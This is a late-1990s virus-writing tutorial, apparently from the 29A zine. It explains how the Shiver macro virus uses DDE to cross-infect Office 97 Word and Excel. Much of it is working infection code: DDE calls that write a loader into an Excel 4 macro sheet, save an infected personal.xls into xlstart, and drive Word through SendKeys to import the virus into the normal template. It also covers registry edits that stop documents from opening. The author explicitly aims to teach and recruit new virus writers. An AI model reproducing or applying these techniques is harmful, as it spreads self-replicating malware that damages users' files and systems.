Cross Infection Tutorial for Office'97 PART II ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> VicodinES An analysis of the cross application macro virus, Shiver, and the use of DDE. Shiver was written by a good friend of mine who goes by the handle ALT-F11. ALT-F11 is part of the a new virus group, The Alternative Virus Mafia. It is with his permission that I write this and that 29A publishes his source. Macro viruses are very low-tech. Anything too complicated can cause notice- able slow downs and obvious infection delays. By using DDE Shiver attempts to use some of the more advanced Office functions to its advantage. DDE stands for Dynamic Data Exchange. It is the mechanism by which Office applications share data and exert limited control over one another. Being that VBA commands are almost identical in Word and Excel you would think that DDE commands would likewise be nearly identical. This however is not the case. Things that you can do to and from Word are not the same things that you can do to and from Excel. Lets go over some DDE basics before I analyze the way that Shiver uses it. Before you can start any DDE communication you need to initialize a chan- nel. The way this is done is to set a variable to Application.DDEInitiate and Windows will return a free DDE communication channel number (the first free one). This is the channel, or pipe, that you will reference until you close it. CNL = Application.DDEInitiate("Excel", "system") I use the variable CNL as the channel number. CNL will be set to the first free open channel to Excel ... if no other DDE is active the channel number will most likely be 1. This example opens up a channel of communication between Word and Excel. The communication is between the two applications and not with any open spreadsheets or workbooks. The "system" specification says that any commands you are going to send down the open DDE pipe are Ex- cel system specific. On the other hand if you were going to send commands to a sheet named "Sheet1" you would need to open an object specific chan- nel: CNL = Application.DDEInitiate("Excel", "Sheet1") or open one with Word "system": CNL = Application.DDEInitiate("MSWord", "system") Ok that's how to open a channel of communication. What to do next? Well that all depends on your goal. I'll start to analyze Shiver here and we will establish that the goal of Shiver at this point is to cross infect from Word to Excel. All the following DDE code is Word specific. Once Shiver has infected Word on the first AutoClose it will check the reg- istry to see if it has cross infected Excel. It checks: HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\ 8.0\Shiver[DDE] if the value does not equal "ALT-F11" (or does not exist) then Shiver next looks to see if Excel is running. Shiver will not attempt cross infection if Excel is running. VBA does not contain native code to allow you to check for active applications (Word Basic did have IsAppActive but VBA does not have this function). You can scan the "tasks" but "task" scanning can't be done from Excel so to keep things even Shiver uses the FindWindowA API and looks to see if the main Excel window is open. [see the Shiver source for API call and window handle] Ok Excel isn't running and hasn't been infected so Shiver next does this: Shell (Application.Path + "\Excel.exe"), vbMinimizedFocus Application.DDETerminateAll CNL = Application.DDEInitiate("Excel", "system") Application.DDEExecute CNL, "[New(4)]" Application.DDETerminate CNL It opens Excel in a minimized window with focus. Shiver then terminates any and all other DDE channels just to be safe and to make sure there is a free channel. It then initiates a pipe of communication with Excel "system". Then it sends it's first DDE command. Do you know what a Excel Formula virus is? An Excel formula virus is a Excel virus that is written in Excel 4 macros - they are not really form- ulas but the AV's have been using that term. There are currently only two XF viruses in existence. Paix and Classic (aka Sic). I have never seen the code from Paix but I wrote Classic so I know a thing or two about Excel 4 macros. They are quite powerful but somewhat limited. Why did I just tell you about Excel 4 macro viruses? Because any and all le gal Excel 4 macro commands can be sent down a DDE pipe to Excel!! Very very important to know! The first command Shiver sends to Excel "system" is New(4) - which is the Excel 4 macro command to add a new Excel 4 macro sheet. To execute a com- mand via DDE you need to use DDEExecute. Shiver then terminates that chan- nel. So a quick recap - Shiver looked and saw Excel wasn't infected so it start- ed Excel minimized, opened a DDE pipe, sent a command to add a new Excel 4 macro sheet and then closed the channel. That leaves us in our current state - Excel and Word both opened, Word in control and Excel minimized with a new macro sheet. What next? CNL = Application.DDEInitiate("Excel", "Macro1") Application.DDEPoke CNL, Item:="R1C1", Data:="=VBA.INSERT.FILE(""c:\shiv er.sys"")" Application.DDEPoke CNL, Item:="R2C1", Data:="=SAVE.AS(""" & Application .Path & "\xlstart\personal.xls"")" Application.DDEPoke CNL, Item:="R3C1", Data:="=Return()" DDEExecute channel:=CNL, Command:="[Run(""R1C1"")]" Application.DDETerminate CNL Shiver then opens a new DDE channel with Excel to the new Excel 4 macro sheet "Macro1" (the default macro sheet name). Now Shiver does not execute any command but sends the macro sheet data. To do this you use the DDEPoke command. What Shiver is doing is creating a virus loader in the Excel 4 ma- cro sheet. In Row 1 Column 1 (R1C1) of that sheet Shiver puts the "import command". In R2C1 it adds the "save as" command (the xlstart directory and the default personal.xls file name). It then adds in R3C1 the return() which is needed at the end of all Excel 4 macros. Excel macros are run from top to bottom and end when the "return()" is reached. So there is now a virus module loader in the new macro sheet. Shiver then runs Row 1 Column 1 (the start of the loader macro). This will load "c:\sh- iver.sys" which the Word part of Shiver previously exported since both parts of Shiver (Word and Excel) use the exact same .bas file. Once that is run Excel is 100% infected on next run because there is an in- fected personal.xls in the xlstart directory. The only problem now is that Excel is still running so Shiver must close Excel via DDE. CNL = Application.DDEInitiate("Excel", "system") Application.DDEExecute CNL, "[RUN(""Personal.xls!PXL_Done"")]" Application.DDETerminate CNL Since Shiver just imported our macro code into a personal.xls it is cur- rently the active workbook in Excel which is still running. Shiver then runs the macro PXL_Done in personal.xls. PXL_Done contains this code: Sub PXL_Done() ActiveWindow.Visible = False Workbooks("personal.xls").Save Application.Quit End Sub What it does is simple. It hides the personal.xls workbook then saves it (personal.xls is considered "dirty" (changed) because Shiver set it hidden so it has to be saved again). Then Excel is closed. Shiver just achieved cross infection from Word to Excel with DDE. It opened Excel, added a new macro sheet. wrote a virus loader into that macro sheet, ran the loader which imported the virus code, saved the workbook, set it hidden and then exited Excel!! Nice! Things to note before we go on: All DDEExecute commands are Excel 4 macro commands also, you must terminate your DDE channels when you are done with them! Now lets turn the tables. Excel is infected and Word is clean. How can Shi- ver jump to Word? Can it add a macro sheet? Yes it can - you can add a new module but you can NOT DDEPoke data too it! So Shiver can't use the same method to go from Excel to Word. How does Shiver do it? It runs the same registry check and check to see if Word is running. Then it.... Shell Application.Path & "\winword.exe", vbMinimizedFocus CNL = Application.DDEInitiate("MSWord", "system") Application.DDEExecute CNL, "[fileclose]" Application.DDEExecute CNL, "[Sendkeys ""%{F11}""]" Application.DDEExecute CNL, "[Sendkeys ""^m""]" Call delay SendKeys "c:\shiver.sys", Wait SendKeys "%o" Application.DDEExecute CNL, "[Sendkeys ""%{F4}""]" Application.DDEExecute CNL, "[Sendkeys ""%{F4}""]" Application.DDEExecute CNL, "[Sendkeys ""y""]" Application.DDETerminate CNL What is that? Doesn't look anything like the way it infected Word does it? I'll take it step by step. First Shiver opens Word minimized with focus. Then it initializes a channel of communication with Word "system". Shiver then sends the FileClose com- mand. This is done to close the default document that opens when you start up Word (you will see why soon). Shiver then opens up the Visual Basic Ed- itor (VBE) with the SendKeys command %{F11} (alt-f11). At this point Word comes out of its minimized state. This is noticeable but unavoidable. The sendkeys here is a bit misleading - you are not just doing a SendKeys (sending keystrokes) to Word. Using DDE you are controlling Word and the keystrokes are coming from within Word - very important - this would not work by just doing a SendKeys from Excel. Next the command ctrl-m is sent. Ctrl-m is the shortcut keystroke within the VBE that brings up the "Import File" dialog box. Shiver then runs a delay routine to ensure that the dia- log box is ready for input. Once the delay is over it sends FROM EXCEL (basic SendKeys now) "c:\shiver.sys" into the Import File dialog box and %o (alt-o for Open). At this point Shiver has just imported shiver.sys into the Word VBE. Shiver was able to import it directly into the normal template because it prev- iously closed the default open document. This is important because this makes it that Word is infected and not just some open document. After infection it's time to get out and save. Shiver sends alt-f4 to close the VBE, than another alt-f4 to close word and finally sends "y" to answer the question "do you want to save changes to the normal template. The ans- wer has to be yes because Shiver just changed the normal template by in- fecting it. An overview: Shiver is two fully functional macro viruses - one for Word and one for Ex- cel that share some subroutines and one VBA module. It has the ability to cross infect without error. It utilizes the registry for cross infection self-recognition. In the world of simple macro viruses this is one of the more complex bugs. I did not cover all it's features but concentrated on its DDE functionality. If you want to see what else it does check out the source. More DDE info: In the registry DDE is used all over the place. Many times you will see keys ...\shell\open\ddeexec\[FileOpen("%1")] this is what explorer uses when it opens a file via a "double click". File- Open "filename" - which is the value passed to %1 just like in batch files. One version of Shiver changed this in the Word.8 section from [FileOpen("%1 ")] to [FileClose("%1")] - this little change made it so that no doc files could be opened from explorer with a "double click". There are also Auto- Exec keys that can be utilized. They can be set to open or run anything on FileOpen (many of the "free" macro virus protection packages use this. Can I offer you any other examples of what can be done with DDE? Look Software came out with Virus ALERT for Macros (Office 97 Edition) when Office 97 first came out. Their product added this to the registry: to the key "HKEY_CLASSES_ROOT\Word.Document.8\shell\Open\ddeexec" they add "[VAFileOpen.VADDEOpen("%1")]" that runs their sub VADDEOpen on a "double click" You can still find this product for free on the web - it's about worthless now as an AV product but I would suggest anyone interested download a copy and pull the source out with HMVS. There are some great examples of REAL VBA DDE code and even good non-DDE code in there. It's one of the few "free macro AV" products I've seen on the web that isn't an upconverted WordBasic template. Their product contains lots of code that translates to VBA macro viruses quite well. There is some crc self recognition code in there that you might find useful also. Also if you plan to explore DDE functionality from within Word or Excel get a copy of the Excel 4 macro commands either from a VX site or from the Microsoft website. That will give you an idea of what you can use via DDE and with DDE in the registry (you'll be surprised at your options). For an example of a Excel 4 macro virus you can find my XF.Classic.Poppy at most VX sites - I included the code in an exposed sheet. peace, VicodinES On a personal note - if anyone is interested in my current status. I have retired from writing viruses but did not fall off the face of the Earth. I will continue to write tutorials, help new viruses writers and if I get a really good idea - well then I may come out of retirement. In the immediate future I will be writing a VB Script virus. tutorial (for CB5?)